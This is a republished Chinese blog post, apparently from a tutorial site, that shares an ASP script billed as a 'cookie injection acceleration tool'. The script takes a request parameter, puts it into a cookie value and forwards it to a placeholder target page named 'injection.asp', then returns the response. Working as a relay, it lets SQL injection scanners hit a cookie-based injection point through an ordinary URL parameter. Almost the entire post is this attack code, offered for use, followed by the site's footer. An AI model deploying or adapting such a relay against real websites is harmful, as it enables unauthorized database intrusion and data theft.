ASP版实现cookies注入加速工具分享


来源:职业欠钱&zj1244共用的public Blog

代码如下:
<%
Str=”xxxid=”&escape(request(“FK”))
Url=”https://xxx.chinaxxx.com/injection.asp”
response.write PostData(Url,Str)

Function PostData(PostUrl,PostCok)
Dim Http
Set Http = Server.CreateObject(“msxml2.serverXMLHTTP”)
With Http

.Open “GET”,PostUrl,False
.SetRequestHeader “Cookie”,PostCok
.Send
PostData = .ResponseBody
End With
Set Http = Nothing
PostData =bytes2BSTR(PostData)
End Function

Function bytes2BSTR(vIn)
Dim strReturn
Dim I, ThisCharCode, NextCharCode
strReturn = “”
For I = 1 To LenB(vIn)
ThisCharCode = AscB(MidB(vIn, I, 1))
If ThisCharCode < &H80 Then
strReturn = strReturn & Chr(ThisCharCode)
Else
NextCharCode = AscB(MidB(vIn, I + 1, 1))
strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
I = I + 1
End If
Next
bytes2BSTR = strReturn
End Function

%>

—-想了解更多的linux相关异常处理怎么解决关注<计算机技术网(www.ctvol.com)!!>



本文来自网络收集,不代表计算机技术网立场,如涉及侵权请联系管理员删除。

ctvol管理联系方式QQ:251552304

本文章地址:https://www.ctvol.com/htmltutorial/72566.html

(0)
上一篇 2020年4月14日
下一篇 2020年4月14日

精彩推荐